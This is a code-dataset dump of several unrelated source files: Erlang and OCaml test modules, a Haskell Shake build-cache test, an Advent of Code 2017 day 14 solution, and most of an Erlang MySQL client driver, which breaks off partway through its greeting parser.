-callback something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
-spec something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
something(_, _, _) ->
result.
| null | https://raw.githubusercontent.com/AdRoll/rebar3_format/5ffb11341796173317ae094d4e165b85fad6aa19/test_app/src/long_specs.erl | erlang | -module(long_specs).
-compile(export_all).
-callback handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
-spec handle_call(term(), {pid(), reference()}, state()) -> {reply, Reply, state()} | {stop, unexpected_call, state()} when Reply :: ok | {error, {already_registered, pid()}}.
handle_call(_, _, _) ->
ok.
-callback metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
-spec metric(Name, Value, Type) -> Result when Name :: binary(), Value :: value(), Type :: metric_type(), Result :: ok.
metric(_, _, _) ->
ok.
-callback send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
-spec send(Name :: binary(), Value :: binary(), Type :: metric_type(), Tags :: [bin_kv()]) -> ok.
send(_, _, _, _) ->
ok.
-callback something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
-spec something(With, Multiple, Clauses) -> Result when With :: with, Multiple :: multiple, Clauses :: clauses, Result :: result;
(With, Multiple, Clauses) -> Result when With :: [with], Multiple :: [multiple], Clauses :: [clauses], Result :: [result];
({With :: with}, {Multiple :: multiple}, {Clauses :: clauses}) -> {Result :: result}.
something(_, _, _) ->
result.
| |
8b67f12085e77b4f66677c13e40db02676d4976d6791f7022d72ee480d44c0c9 | aeternity/mnesia_leveled | mnesia_leveled_conv_bigtab.erl | %%----------------------------------------------------------------
Copyright ( c ) 2013 - 2016 Klarna AB
%%
This file is provided to you under the Apache License ,
%% Version 2.0 (the "License"); you may not use this file
except in compliance with the License . You may obtain
%% a copy of the License at
%%
%% -2.0
%%
%% Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
" AS IS " BASIS , WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%----------------------------------------------------------------
-module(mnesia_leveled_conv_bigtab).
-export([init/0, mktab/2, run/1]).
-record(t, {k, i, v}).
run(Sz) ->
mnesia:stop(),
init(),
mktab(disc_copies, Sz),
mnesia:change_table_copy_type(t, node(), led).
init() ->
mnesia_leveled_tlib:start_mnesia(reset).
mktab(Backend, Sz) ->
mnesia_leveled_tlib:create_table(Backend, [k, i, v], [i]),
fill_table(Sz).
fill_table(Sz) when is_integer(Sz), Sz > 0 ->
fill_table(1, Sz).
fill_table(N, Max) when N =< Max ->
mnesia:dirty_write(#t{k = N, i = N, v = val()}),
fill_table(N+1, Max);
fill_table(N, _) when is_integer(N) ->
ok.
val() ->
{1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0}.
| null | https://raw.githubusercontent.com/aeternity/mnesia_leveled/11c480b5546ed6087ae688e8596bd596a1f7bdd1/test/mnesia_leveled_conv_bigtab.erl | erlang | ----------------------------------------------------------------
Version 2.0 (the "License"); you may not use this file
a copy of the License at
-2.0
Unless required by applicable law or agreed to in writing,
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
---------------------------------------------------------------- | Copyright ( c ) 2013 - 2016 Klarna AB
This file is provided to you under the Apache License ,
except in compliance with the License . You may obtain
software distributed under the License is distributed on an
" AS IS " BASIS , WITHOUT WARRANTIES OR CONDITIONS OF ANY
-module(mnesia_leveled_conv_bigtab).
-export([init/0, mktab/2, run/1]).
-record(t, {k, i, v}).
run(Sz) ->
mnesia:stop(),
init(),
mktab(disc_copies, Sz),
mnesia:change_table_copy_type(t, node(), led).
init() ->
mnesia_leveled_tlib:start_mnesia(reset).
mktab(Backend, Sz) ->
mnesia_leveled_tlib:create_table(Backend, [k, i, v], [i]),
fill_table(Sz).
fill_table(Sz) when is_integer(Sz), Sz > 0 ->
fill_table(1, Sz).
fill_table(N, Max) when N =< Max ->
mnesia:dirty_write(#t{k = N, i = N, v = val()}),
fill_table(N+1, Max);
fill_table(N, _) when is_integer(N) ->
ok.
val() ->
{1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0,
1,2,3,4,5,6,7,8,9,0}.
|
a81e61b7a1c78f967bd8b4f22b1e79b019f952af1c00d722a5dd5ec89189cab8 | janestreet/memtrace_viewer_with_deps | test_day_of_week.ml | open! Core_kernel
open! Import
open! Day_of_week
let num_days_in_week = 7
let%test_module "Day_of_week.V1" =
(module Stable_unit_test.Make (struct
include Stable.V1
let equal = [%compare.equal: t]
let tests =
[ Sun, "SUN", "\000"
; Mon, "MON", "\001"
; Tue, "TUE", "\002"
; Wed, "WED", "\003"
; Thu, "THU", "\004"
; Fri, "FRI", "\005"
; Sat, "SAT", "\006"
]
;;
end))
;;
let%test _ = List.is_sorted all ~compare
let%test "to_string_long output parses with of_string" =
List.for_all all ~f:(fun d -> d = (to_string_long d |> of_string))
;;
let%test _ = Int.(num_days ~from:Mon ~to_:Tue = 1)
let%test _ = Int.(num_days ~from:Tue ~to_:Mon = 6)
let%test "num_days is inverse to shift" =
let all_days = [ Sun; Mon; Tue; Wed; Thu; Fri; Sat ] in
List.for_all (List.cartesian_product all_days all_days) ~f:(fun (from, to_) ->
let i = num_days ~from ~to_ in
Int.(0 <= i && i < num_days_in_week) && shift from i = to_)
;;
| null | https://raw.githubusercontent.com/janestreet/memtrace_viewer_with_deps/5a9e1f927f5f8333e2d71c8d3ca03a45587422c4/vendor/core_kernel/test/src/test_day_of_week.ml | ocaml | open! Core_kernel
open! Import
open! Day_of_week
let num_days_in_week = 7
let%test_module "Day_of_week.V1" =
(module Stable_unit_test.Make (struct
include Stable.V1
let equal = [%compare.equal: t]
let tests =
[ Sun, "SUN", "\000"
; Mon, "MON", "\001"
; Tue, "TUE", "\002"
; Wed, "WED", "\003"
; Thu, "THU", "\004"
; Fri, "FRI", "\005"
; Sat, "SAT", "\006"
]
;;
end))
;;
let%test _ = List.is_sorted all ~compare
let%test "to_string_long output parses with of_string" =
List.for_all all ~f:(fun d -> d = (to_string_long d |> of_string))
;;
let%test _ = Int.(num_days ~from:Mon ~to_:Tue = 1)
let%test _ = Int.(num_days ~from:Tue ~to_:Mon = 6)
let%test "num_days is inverse to shift" =
let all_days = [ Sun; Mon; Tue; Wed; Thu; Fri; Sat ] in
List.for_all (List.cartesian_product all_days all_days) ~f:(fun (from, to_) ->
let i = num_days ~from ~to_ in
Int.(0 <= i && i < num_days_in_week) && shift from i = to_)
;;
| |
960fc5458f83f0ffe5248524b06a2a06f5073cc870d5b628f39ae4f7ec82b203 | ndmitchell/shake | Cache.hs |
module Test.Cache(main) where
import Development.Shake
import Development.Shake.FilePath
import System.Directory
import Data.Char
import Test.Type
main = testBuild test $ do
vowels <- newCache $ \file -> do
src <- readFile' file
liftIO $ appendFile "trace.txt" "1"
pure $ length $ filter isDigit src
"*.out*" %> \x ->
writeFile' x . show =<< vowels (dropExtension x <.> "txt")
startCompiler <- newCache $ \() -> do
liftIO $ writeFile "compiler.txt" "on"
runAfter $ writeFile "compiler.txt" "off"
"*.lang" %> \out -> do
startCompiler ()
liftIO $ copyFile "compiler.txt" out
-- Bug fixed in
bug796_2 <- newCache $ \() -> do
readFile' "bug796.2"
"bug796" %> \out -> do
a <- readFile' "bug796.1"
b <- bug796_2 ()
writeFile' out $ a ++ b
test build = do
build ["clean"]
writeFile "trace.txt" ""
writeFile "vowels.txt" "abc123a"
build ["vowels.out1","vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
assertContents "vowels.out2" "3"
build ["vowels.out2","-j3"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
writeFile "vowels.txt" "12xyz34"
build ["vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "11"
assertContents "vowels.out2" "4"
build ["vowels.out1","-j3","--sleep"]
assertContents "trace.txt" "111"
assertContents "vowels.out1" "4"
build ["foo.lang","bar.lang"]
assertContents "foo.lang" "on"
assertContents "compiler.txt" "off"
writeFile "compiler.txt" "unstarted"
build ["foo.lang","bar.lang"]
assertContents "compiler.txt" "unstarted"
writeFile "bug796.1" "a"
writeFile "bug796.2" "b"
build ["bug796", "--sleep"]
assertContents "bug796" "ab"
writeFile "bug796.1" "A"
build ["bug796", "--sleep"]
assertContents "bug796" "Ab"
writeFile "bug796.2" "B"
build ["bug796", "--sleep"]
assertContents "bug796" "AB"
| null | https://raw.githubusercontent.com/ndmitchell/shake/1e8c1db2a55b70c1e2ba404c1eb476c7b6d9c8ac/src/Test/Cache.hs | haskell | Bug fixed in |
module Test.Cache(main) where
import Development.Shake
import Development.Shake.FilePath
import System.Directory
import Data.Char
import Test.Type
main = testBuild test $ do
vowels <- newCache $ \file -> do
src <- readFile' file
liftIO $ appendFile "trace.txt" "1"
pure $ length $ filter isDigit src
"*.out*" %> \x ->
writeFile' x . show =<< vowels (dropExtension x <.> "txt")
startCompiler <- newCache $ \() -> do
liftIO $ writeFile "compiler.txt" "on"
runAfter $ writeFile "compiler.txt" "off"
"*.lang" %> \out -> do
startCompiler ()
liftIO $ copyFile "compiler.txt" out
bug796_2 <- newCache $ \() -> do
readFile' "bug796.2"
"bug796" %> \out -> do
a <- readFile' "bug796.1"
b <- bug796_2 ()
writeFile' out $ a ++ b
test build = do
build ["clean"]
writeFile "trace.txt" ""
writeFile "vowels.txt" "abc123a"
build ["vowels.out1","vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
assertContents "vowels.out2" "3"
build ["vowels.out2","-j3"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
writeFile "vowels.txt" "12xyz34"
build ["vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "11"
assertContents "vowels.out2" "4"
build ["vowels.out1","-j3","--sleep"]
assertContents "trace.txt" "111"
assertContents "vowels.out1" "4"
build ["foo.lang","bar.lang"]
assertContents "foo.lang" "on"
assertContents "compiler.txt" "off"
writeFile "compiler.txt" "unstarted"
build ["foo.lang","bar.lang"]
assertContents "compiler.txt" "unstarted"
writeFile "bug796.1" "a"
writeFile "bug796.2" "b"
build ["bug796", "--sleep"]
assertContents "bug796" "ab"
writeFile "bug796.1" "A"
build ["bug796", "--sleep"]
assertContents "bug796" "Ab"
writeFile "bug796.2" "B"
build ["bug796", "--sleep"]
assertContents "bug796" "AB"
|
8c5f9e7fc13a4fce67b710314040947037991c7a9b831a8aa2757b409dd19a19 | jesperes/aoc_erlang | aoc2017_day14.erl | -module(aoc2017_day14).
-behavior(aoc_puzzle).
-include_lib("eunit/include/eunit.hrl").
-export([parse/1, solve1/1, solve2/1, info/0]).
-include("aoc_puzzle.hrl").
-spec info() -> aoc_puzzle().
info() ->
#aoc_puzzle{module = ?MODULE,
year = 2017,
day = 14,
name = "Disk Defragmentation",
expected = {8230, 1103},
has_input_file = false}.
-type input_type() :: [string()].
-type result_type() :: integer().
-spec parse(Binary :: binary()) -> input_type().
parse(_Binary) ->
Input = "hfdlxzhv",
lists:map(
fun(N) ->
Str = lists:flatten(io_lib:format("~s-~w", [Input, N])),
str_to_knot_hash_bits(Str)
end, lists:seq(0, 127)).
-spec solve1(Input :: input_type()) -> result_type().
solve1(Bits) ->
Ones = lists:filter(
fun(C) -> C =:= $1 end,
lists:flatten(Bits)),
length(Ones).
str_to_knot_hash_bits(Str) ->
KnotHash = aoc2017_day10:knot_hash(Str),
Bits = integer_to_list(list_to_integer(KnotHash, 16), 2),
string:right(Bits, 128, $0).
-spec solve2(Input :: input_type()) -> result_type().
solve2(Lines) ->
Set = bits_to_coord_set(Lines),
count_regions(Set).
bits_to_coord_set(Lines) ->
{_, Set} =
lists:foldl(
fun(Line, {Y, Coords}) ->
CoordsOut = fold_line(Line, Y, Coords),
{Y + 1, CoordsOut}
end, {0, gb_sets:new()}, Lines),
Set.
fold_line(Line, Y, Coords) ->
{_, CoordsOut} =
lists:foldl(
fun($1, {X, Acc}) ->
{X + 1, gb_sets:add_element({X, Y}, Acc)};
(_, {X, Acc}) ->
{X + 1, Acc}
end, {0, Coords}, Line),
CoordsOut.
count_regions(Set) ->
count_regions(Set, 1).
count_regions(Set, Num) ->
{First, Set0} = gb_sets:take_smallest(Set),
Set1 = fill_at(First, Num, Set0),
case gb_sets:is_empty(Set1) of
true -> Num;
false -> count_regions(Set1, Num + 1)
end.
fill_at({X, Y}, Num, Set) ->
Neighbors =
[ Nbr || Nbr <- [ {X - 1, Y},
{X, Y - 1},
{X + 1, Y},
{X, Y + 1}
],
gb_sets:is_element(Nbr, Set)
],
lists:foldl(
fun(Nbr, Acc) ->
fill_at(Nbr, Num, gb_sets:del_element(Nbr, Acc))
end, Set, Neighbors).
| null | https://raw.githubusercontent.com/jesperes/aoc_erlang/14c654288993c54f5385956bc6c8cecce3c1d6c3/src/2017/aoc2017_day14.erl | erlang | -module(aoc2017_day14).
-behavior(aoc_puzzle).
-include_lib("eunit/include/eunit.hrl").
-export([parse/1, solve1/1, solve2/1, info/0]).
-include("aoc_puzzle.hrl").
-spec info() -> aoc_puzzle().
info() ->
#aoc_puzzle{module = ?MODULE,
year = 2017,
day = 14,
name = "Disk Defragmentation",
expected = {8230, 1103},
has_input_file = false}.
-type input_type() :: [string()].
-type result_type() :: integer().
-spec parse(Binary :: binary()) -> input_type().
parse(_Binary) ->
Input = "hfdlxzhv",
lists:map(
fun(N) ->
Str = lists:flatten(io_lib:format("~s-~w", [Input, N])),
str_to_knot_hash_bits(Str)
end, lists:seq(0, 127)).
-spec solve1(Input :: input_type()) -> result_type().
solve1(Bits) ->
Ones = lists:filter(
fun(C) -> C =:= $1 end,
lists:flatten(Bits)),
length(Ones).
str_to_knot_hash_bits(Str) ->
KnotHash = aoc2017_day10:knot_hash(Str),
Bits = integer_to_list(list_to_integer(KnotHash, 16), 2),
string:right(Bits, 128, $0).
-spec solve2(Input :: input_type()) -> result_type().
solve2(Lines) ->
Set = bits_to_coord_set(Lines),
count_regions(Set).
bits_to_coord_set(Lines) ->
{_, Set} =
lists:foldl(
fun(Line, {Y, Coords}) ->
CoordsOut = fold_line(Line, Y, Coords),
{Y + 1, CoordsOut}
end, {0, gb_sets:new()}, Lines),
Set.
fold_line(Line, Y, Coords) ->
{_, CoordsOut} =
lists:foldl(
fun($1, {X, Acc}) ->
{X + 1, gb_sets:add_element({X, Y}, Acc)};
(_, {X, Acc}) ->
{X + 1, Acc}
end, {0, Coords}, Line),
CoordsOut.
count_regions(Set) ->
count_regions(Set, 1).
count_regions(Set, Num) ->
{First, Set0} = gb_sets:take_smallest(Set),
Set1 = fill_at(First, Num, Set0),
case gb_sets:is_empty(Set1) of
true -> Num;
false -> count_regions(Set1, Num + 1)
end.
fill_at({X, Y}, Num, Set) ->
Neighbors =
[ Nbr || Nbr <- [ {X - 1, Y},
{X, Y - 1},
{X + 1, Y},
{X, Y + 1}
],
gb_sets:is_element(Nbr, Set)
],
lists:foldl(
fun(Nbr, Acc) ->
fill_at(Nbr, Num, gb_sets:del_element(Nbr, Acc))
end, Set, Neighbors).
| |
2574b3ac67aca7a143949ba995dbc7df42b056fa4122d78cec461d3dec932554 | joearms/elib1 | elib1_mysql.erl | Copyright ( c ) 2006 - 2009
See MIT - LICENSE for licensing information .
-module(elib1_mysql).
%% File: mysql2.erl
%% Description: MySQL driver
Started : 4 Aug 2005
Time - stamp : < 2009 - 09 - 22 21:04:13 joe >
Notes
Origonal author :
Origonal Copyright : ( c ) 2001 - 2004 Kungliga Tekniska Högskolan
Modifications : < >
< >
%%
%% Testing:
run mysql2 : ) , ... etc .
Notes :
%% 1)
%% You have to provide your own password module
%% like this
%% -module(password).
-export([username/1 , password/1 ] ) .
%% username(mysql) -> "<User>".
%% password(mysql) -> "<Password>".
%%
%% 2) You must me able to access mysql with the above username
%% and password.
%% Try the command:
%% $ mysql -u <User> -p
%% Enter password: <Password>
%% If this is ok then your passwords etc are correctly setup
%%
%% -compile(export_all).
-export([start/2, start/3, start/4, cmd/2,
insert/2,
quote/1,
stop/1, test/1, debug/2]).
-import(lists, [reverse/1, seq/2, zipwith/3]).
-define(LONG_PASSWORD, 1).
-define(FOUND_ROWS, 2).
-define(LONG_FLAG, 4).
-define(PROTOCOL_41, 512).
-define(TRANSACTIONS, 8192).
-define(CONNECT_WITH_DB, 8).
-define(MAX_PACKET_SIZE, 1000000).
-define(SECURE_CONNECTION, 32768).
-define(MYSQL_QUERY_OP, 3).
test(1) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "show databases"),
cmd(Pid, "use test"),
cmd(Pid, "show tables"),
debug(Pid, true),
cmd(Pid, "select * from country limit 0,5"),
stop(Pid);
test(2) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "use test"),
cmd(Pid, "drop table if exists hash"),
cmd(Pid, "create table if not exists hash ("
"k CHAR(32) not null primary key," %% don't call this key
"val longblob not null)"),
cmd(Pid, "show tables"),
cmd(Pid, "insert into hash values ('abc','123')"),
cmd(Pid, insert("hash", [test,seq(0,255)])),
V1 = cmd(Pid, "select * from hash"),
cmd(Pid, "select val from hash where k='test'"),
cmd(Pid, "update hash set val='123' where k='test'"),
V2 = cmd(Pid, "select * from hash"),
stop(Pid),
{V1,V2}.
insert(Table, Vals) when is_list(Table) ->
["insert into ", Table, " values ", value_list(Vals)].
value_list(L) ->
[$(, value_list1(L), $)].
value_list1([H]) -> quote(H);
value_list1([H|T]) -> [quote(H),$,|value_list1(T)].
debug(Pid, Flag) ->
Pid ! {debug, Flag}.
cmd(Pid, Q) ->
rpc(Pid, {do_query, Q}).
rpc(Pid, Q) ->
Pid ! {self(), Q},
receive
{Pid, Reply} ->
Reply
end.
stop(Pid) ->
Pid ! stop.
%%----------------------------------------------------------------------
%% main entry point
start(User, Pass) -> start("localhost", 3306, User, Pass).
start(Host, User, Pass) -> start(Host, 3306, User, Pass).
start(Host, Port, User, Pass) ->
S = self(),
Pid = spawn_link(fun() -> init(Host, Port, User, Pass, S) end),
receive
{Pid, Ret} ->
Ret
end.
init(Host, Port, User, Pass, Parent) ->
S = self(),
Pid = spawn_link(fun() -> socket_driver(Host, Port, S) end),
receive
{Pid, ok} ->
case do_auth(Pid, User, Pass) of
{ok, Vsn} ->
Parent ! {self(), {ok, self()}},
top_loop(Vsn, Pid, false);
{error,_} = E ->
Parent ! {self(), E}
end;
{Pid, Error} ->
Parent ! {self(), Error}
end.
top_loop(Vsn, Driver, Debug) ->
receive
{debug, Flag} ->
top_loop(Vsn, Driver, Flag);
stop ->
Driver ! stop;
{From, {do_query, Q}} ->
Response = do_query(Driver, Vsn, Debug, Q),
From ! {self(), Response},
top_loop(Vsn, Driver, Debug);
Any ->
io:format("top_loop unexpected message:~p~n",[Any]),
top_loop(Vsn, Driver, Debug)
end.
%%----------------------------------------------------------------------
socket_driver(Host , Port , Parent )
%% try to open a socket to <Host,Port>
%% send Parent ! {self(), ok} if this succeeds
%% {self(), {error, Why}} if this fails
socket_driver(Host, Port, Parent) ->
case gen_tcp:connect(Host, Port, [binary, {packet, 0}]) of
{ok, Sock} ->
Parent ! {self(), ok},
driver_loop(Sock, Parent, <<>>);
{error, _} = E ->
Parent ! {self(), E}
end.
driver_loop(Sock, Pid, Bin0) ->
receive
stop ->
gen_tcp:close(Sock);
{tcp, Sock, Bin1} ->
Bin2 = list_to_binary([Bin0, Bin1]),
%% send data to parent if we have enough data
Bin3 = sendpacket(Pid, Bin2),
driver_loop(Sock, Pid, Bin3);
{tcp_error, Sock, Reason} ->
io:format("Socket error:~p ~p~n", [Sock, Reason]),
exit(oopps);
{tcp_closed, Sock} ->
Pid ! {self(), closed};
{send, Packet, Seq} ->
%% io:format("tosql:~p~n",[Packet]),
Bin = <<(size(Packet)):24/little, Seq:8, Packet/binary>>,
gen_tcp:send(Sock, Bin),
driver_loop(Sock, Pid, Bin0);
Other ->
io:format("uugh:~p~n",[Other]),
driver_loop(Sock, Pid, Bin0)
end.
sendpacket(Pid, Bin) ->
case Bin of
<<Length:24/little, Num:8, D/binary>> ->
if
Length =< size(D) ->
{Packet, Rest} = split_binary(D, Length),
io : format("from mysql:~p ~ n",[{mysql , Packet , } ] ) ,
Pid ! {self(), {mysql, Packet, Num}},
sendpacket(Pid, Rest);
true ->
Bin
end;
_ ->
Bin
end.
%%----------------------------------------------------------------------
%% do_query(...)
do_query(Pid, Vsn, Debug, Query) ->
Packet = list_to_binary([?MYSQL_QUERY_OP, Query]),
Pid ! {send, Packet, 0},
Response = get_query_response(Pid, Vsn),
case Response of
{error, Str} ->
io:format("Bad query:~s~nRespnse:~s~n",[Query,Str]);
_ ->
debug(Debug, "Query=~p~nResponse=~p~n",[Query, Response])
end,
Response.
debug(false, _, _) -> void;
debug(true, Format, Data) -> io:format(Format, Data).
get_query_response(Pid, Vsn) ->
<<Fieldcount:8, Rest/binary>> = do_recv(Pid),
%% io:format("Fieldcount:~p~n",[Fieldcount]),
case Fieldcount of
0 ->
%% No Tabular data
<<AffectedRows:8, _Rest2/binary>> = Rest,
{updated, AffectedRows};
255 ->
<<_Code:16/little, Message/binary>> = Rest,
{error, binary_to_list(Message)};
_ ->
Tabular data received
Fields = get_fields(Pid, [], Vsn),
%% io:format("Fields=~p~n",[Fields]),
Rows = get_rows(Fieldcount, Pid, []),
{data, Fields, Rows}
end.
get_fields(Pid, Res, my_sql_40) ->
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{Table, Rest} = get_with_length(Packet),
{Field, Rest2} = get_with_length(Rest),
{LengthB, Rest3} = get_with_length(Rest2),
LengthL = size(LengthB) * 8,
<<Length:LengthL/little>> = LengthB,
{Type, Rest4} = get_with_length(Rest3),
{_Flags, _Rest5} = get_with_length(Rest4),
Val = {binary_to_list(Table),
binary_to_list(Field),
Length,
TODO : Check on MySQL 4.0 if types are specified
using the same 4.1 formalism and could
%% be expanded to atoms:
binary_to_list(Type)},
get_fields(Pid, [Val|Res], my_sql_40)
end;
get_fields(Pid, Res, my_sql_41) ->
Support for MySQL 4.1.x and 5.x :
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{_Catalog, Rest} = get_with_length(Packet),
{Database, Rest2} = get_with_length(Rest),
{Table, Rest3} = get_with_length(Rest2),
OrgTable is the real table name if Table is an alias
{_OrgTable, Rest4} = get_with_length(Rest3),
{Field, Rest5} = get_with_length(Rest4),
OrgField is the real field name if Field is an alias
{_OrgField, Rest6} = get_with_length(Rest5),
<<_Metadata:8/little, _Charset:16/little,
Length:32/little, Type:8/little,
_Flags:16/little, _Decimals:8/little,
_Rest7/binary>> = Rest6,
This = {binary_to_list(Database),
binary_to_list(Table),
binary_to_list(Field),
Length,
get_field_datatype(Type)},
get_fields(Pid, [This | Res], my_sql_41)
end.
get_rows repeatedly receives rows until end - of - rows ( 254 )
is received . Each row has Nfields entries
get_rows(NFields, Pid, L) ->
Packet = do_recv(Pid),
case Packet of
<<254:8, Rest/binary>> when size(Rest) < 8 ->
%% the last packet
reverse(L);
_ ->
Row = get_row(NFields, Packet),
get_rows(NFields, Pid, [Row|L])
end.
%% get_row(N, Data, L) ->
%% unpacks exactly N values from Data
get_row(0, _) ->
[];
get_row(N, Data) ->
{Val, Data1} = get_with_length(Data),
[Val|get_row(N-1, Data1)].
get_with_length(<<251:8, B/binary>>) -> {null, B};
get_with_length(<<252:8, Len:16/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<253:8, Len:24/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<254:8, Len:64/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<Len:8, B/binary>>) when Len < 251 -> split_binary(B, Len).
%%----------------------------------------------------------------------
do_auth(Pid , , password ) - > { ok , Version } | { error , Why }
do_auth(Pid, User, Password) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Version, Salt1, Salt2, Caps} = greeting(Packet),
AuthRes =
case is_secure_connection(Caps) of
true ->
do_new_auth(Pid,Seq+1,User,Password,Salt1,Salt2);
false ->
do_old_auth(Pid,Seq+1,User,Password,Salt1)
end,
%% io:format("AuthRes=~p~n",[AuthRes]),
case AuthRes of
{ok, <<0:8, _Rest/binary>>, _RecvNum} ->
{ok, Version};
{ok, <<255:8, Code:16/little, Message/binary>>, _RecvNum} ->
io:format("mysql_conn: init error ~p: ~p~n",
[Code, binary_to_list(Message)]),
{error, binary_to_list(Message)};
{ok, RecvPacket, _RecvNum} ->
io:format("mysql_conn: init unknown error ~p~n",
[binary_to_list(RecvPacket)]),
{error, binary_to_list(RecvPacket)};
{error, Reason} ->
io:format("mysql_conn: init failed receiving data : ~p~n",
[Reason]),
{error, Reason}
end;
{error, Reason} ->
{error, Reason}
end.
do_old_auth(Pid, Seq, User, Password, Salt1) ->
%% io:format("do old auth~n"),
Auth = password_old(Password, Salt1),
Packet2 = make_auth(User, Auth),
send_mysql(Pid, Packet2, Seq),
do_recv(Pid, Seq).
do_new_auth(Pid, Seq, User, Password, Salt1, Salt2) ->
%% io:format("do new auth~n"),
Auth = password_new(Password, Salt1 ++ Salt2),
Packet2 = make_new_auth(User, Auth, none),
send_mysql(Pid, Packet2, Seq),
receive
{Pid, {mysql, Packet3, Seq1}} ->
case Packet3 of
<<254:8>> ->
AuthOld = password_old(Password, Salt1),
send_mysql(Pid, <<AuthOld/binary, 0:8>>, Seq1 + 1),
do_recv(Pid, Seq);
_ ->
{ok, Packet3, Seq1}
end;
Other ->
{error, {oops, Pid, Other}}
end.
password_new(Pwd, Salt) ->
Hash1 = elib1_sha1:binstring(Pwd),
Hash2 = elib1_sha1:binstring(binary_to_list(Hash1)),
Res = elib1_sha1:binstring(Salt ++ binary_to_list(Hash2)),
bxor_binary(Res, Hash1).
password_old(Password, Salt) ->
{P1, P2} = hash(Password),
{S1, S2} = hash(Salt),
Seed1 = P1 bxor S1,
Seed2 = P2 bxor S2,
List = rnd(9, Seed1, Seed2),
{L, [Extra]} = lists:split(8, List),
list_to_binary(lists:map(fun (E) ->
E bxor (Extra - 64)
end, L)).
%% part of do_old_auth/4, which is part of mysql_init/4
make_auth(User, Password) ->
Caps = ?LONG_PASSWORD bor ?LONG_FLAG
bor ?TRANSACTIONS bor ?FOUND_ROWS,
Maxsize = 0,
UserB = list_to_binary(User),
PasswordB = Password,
<<Caps:16/little, Maxsize:24/little, UserB/binary, 0:8,
PasswordB/binary>>.
make_new_auth(User, Password, Database) ->
DBCaps = case Database of
none ->
0;
_ ->
?CONNECT_WITH_DB
end,
Caps = ?LONG_PASSWORD bor ?LONG_FLAG bor ?TRANSACTIONS bor
?PROTOCOL_41 bor ?SECURE_CONNECTION bor DBCaps
bor ?FOUND_ROWS,
Maxsize = ?MAX_PACKET_SIZE,
UserB = list_to_binary(User),
PasswordL = size(Password),
DatabaseB = case Database of
none ->
<<>>;
_ ->
list_to_binary(Database)
end,
<<Caps:32/little, Maxsize:32/little, 8:8, 0:23/integer-unit:8,
UserB/binary, 0:8, PasswordL:8, Password/binary, DatabaseB/binary>>.
hash(S) ->
hash(S, 1345345333, 305419889, 7).
hash([C | S], N1, N2, Add) ->
N1_1 = N1 bxor (((N1 band 63) + Add) * C + N1 * 256),
N2_1 = N2 + ((N2 * 256) bxor N1_1),
Add_1 = Add + C,
hash(S, N1_1, N2_1, Add_1);
hash([], N1, N2, _Add) ->
Mask = (1 bsl 31) - 1,
{N1 band Mask , N2 band Mask}.
%%----------------------------------------------------------------------
%% parse the initial greeting from mysql
greeting(Packet) ->
<<_Protocol:8, Rest/binary>> = Packet,
{Version, Rest2} = asciz(Rest),
<<_TreadID:32/little, Rest3/binary>> = Rest2,
{Salt, Rest4} = asciz(Rest3),
<<Caps:16/little, Rest5/binary>> = Rest4,
<<_ServerChar:16/binary-unit:8, Rest6/binary>> = Rest5,
{Salt2, _Rest7} = asciz(Rest6),
%%% io:format("greeting version ~p (protocol ~p) salt ~p caps ~p "
%%% "serverchar ~p salt2 ~p~n",
